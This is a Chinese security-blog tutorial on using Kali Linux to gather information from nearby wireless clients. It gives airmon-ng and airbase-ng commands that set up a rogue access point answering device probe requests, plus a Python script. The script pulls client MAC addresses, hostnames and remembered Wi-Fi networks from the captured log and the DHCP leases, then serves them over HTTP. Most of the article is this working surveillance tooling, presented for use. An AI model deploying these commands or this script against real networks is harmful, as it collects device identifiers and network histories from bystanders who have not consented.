关注我们

Kali Linux渗透之获取主机名、MAC

LzersLzers 安全文摘 2018-09-12 1192575 0

Kali Linux渗透之获取主机名、MAC

初见Kali,就觉得很不一般,于是摸索起来,终于有所领悟。

------Kali Linux无线渗透之主机名、MAC与wifi信息获取------

开启kali,打开终端,键入 ifconfig -a查看网卡信息。

Kali Linux渗透之获取主机名、MAC

键入命令: ifconfig wlan0 up #激活wlan0网卡

airmon-ng check kill #杀死影响进程

airmon-ng start wlan0 #将wlan0置为监听模式

airbase-ng -P -C 30 -v wlan0mon | tee wifi1.txt| #软件虚拟AP,伪造虚假响应包(Probe Response)来回应STA(Wireless station,手机、平板等客户端等)的探测(Probe Request),并将结果保存在wifi1.txt文件中。

Kali Linux渗透之获取主机名、MAC

Kali Linux渗透之获取主机名、MAC

Kali Linux渗透之获取主机名、MAC

运行python脚本,生成两个文件Host.json和Mac.json查看STA的的主机名和mac以及曾经连过的wifi

Kali Linux渗透之获取主机名、MAC

到此,本次任务完成。(喜欢文章 请点击右上方“+关注”)

python脚本如下:

import SimpleHTTPServer
import SocketServer
import threading
import os
import json
from time import sleep
class back(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def cmd(self,c):
c=os.popen(c).read()
return c
def run(self):
while True:
cmd_=self.cmd("cat /var/wifi1.txt |grep -|awk -F 'from ' '{print$2}'|sort |uniq ").replace('"','').split(' ')
nohup=''
self.cmd("echo > /wifi1.txt ")
x=0
for i in cmd_:
j=' "%d":"%s",' %(x,i)
nohup+= j
x+=1
nohup='{%s}'%nohup[:len(nohup)-1]
cmd_h=self.cmd("cat /var/lib/dhcp/dhcpd.leases|grep host|awk '{print$2}' ").replace('"','').split(' ')
x=0
dhcp=''
for i in cmd_h:
j=' "%d":"%s",' %(x,i)
dhcp+= j
x+=1
dhcp='{%s}'%dhcp[:len(dhcp)-1]
open('Host.json','w').write(dhcp)
open('Mac.json','w').write(nohup)
print dhcp,nohup
print "reading .."
sleep(30)
back().start()
PORT = 8009
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢5发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址